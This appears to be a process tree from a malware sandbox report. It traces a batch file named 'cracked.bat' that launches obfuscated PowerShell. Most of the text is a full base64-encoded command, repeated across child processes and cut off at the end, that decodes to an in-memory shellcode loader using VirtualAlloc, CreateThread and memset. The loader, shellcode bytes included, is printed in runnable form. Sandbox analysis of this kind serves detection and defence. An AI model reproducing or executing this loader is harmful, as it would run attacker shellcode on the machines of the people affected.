C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\cracked.bat" "
1⤵
PID:5728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv N -;sv xBk ec;sv S ((gv N).value.toString()+(gv xBk).value.toString());powershell (gv S).value.toString() 'JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA='"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA=
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5892

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAHoAVAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AegBUACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZgAsADAAeABlAGYALAAwAHgAOAAzACwAMAB4ADYAMwAsADAAeAA3ADQALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAY